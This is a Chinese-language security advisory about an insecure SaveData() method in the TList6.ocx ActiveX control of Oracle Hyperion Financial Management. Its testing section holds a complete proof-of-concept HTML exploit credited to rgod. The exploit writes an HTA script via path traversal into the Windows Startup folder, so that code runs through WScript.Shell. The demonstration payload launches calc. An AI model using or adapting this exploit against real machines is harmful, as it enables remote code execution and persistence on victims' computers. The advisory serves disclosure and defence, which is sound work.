发布日期：2011-11-01
更新日期：2011-11-02

受影响系统：

Oracle Oracle Hyperion Financial Management

描述：

---

BUGTRAQ  ID: 50476

Oracle Hyperion Financial Management是综合性的、可扩展的、基于Web的国际财务集成、报告和分析的解决方案。

Oracle Hyperion Financial Management "TList6.ocx" ActiveX控件在实现上存在不安全SaveData()方法漏洞，可被攻击者利用通过使用ActiveX控件的受影响应用在计算机上创建或覆盖任意文件。

<*来源：rgod （rgod@autistici.org）
  
  链接：http://retrogod.altervista.org/9sg_ohfm_adv.html
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<html><head> <meta http-equiv="content-type" content="text/html; charset=ISO-8859-1"></head><body><pre>&lt;!-- Oracle

Hyperion Financial Management 11.1.2.1.0 TList6.ocx ActiveX Control Remote Code Execution Vulnerability PoC tested against

Internet Explorer 8 Microsoft Windows 2003 r2 sp2 Binary Path: C:\WINDOWS\system32\TList6.ocx ProgID: TList.TList.6 CLSID:

{65996200-3B87-11D4-A21F-00E029189826} Safe for Initialization (Registry): True Safe for Scripting (Registry): True rgod --

&gt; &lt;!-- saved from url=(0014)about:internet --&gt; &lt;html&gt; &lt;object classid='clsid:65996200-3B87-11D4-A21F-

00E029189826' id='obj' /&gt; &lt;/object&gt; &lt;script&gt; obj.Caption =

"&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&lt;" + "SCRIPT&gt; var x=new ActiveXObject

(\"WScript.Shell\"); x.Exec(\"CALC.EXE\"); &lt;" +"/SCRIPT&gt;"; obj.SaveData("..\\..\\..\\..\\..\\..\\..\\..\\..\\Documents

and Settings\\All Users\\Start Menu\\Programs\\Startup\\suntzu.hta"); &lt;/script&gt; </pre></body></html>

建议：

---

厂商补丁：

Oracle
------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.oracle.com/technetwork/topics/security/

浏览次数：2438
严重程度：0（网友投票）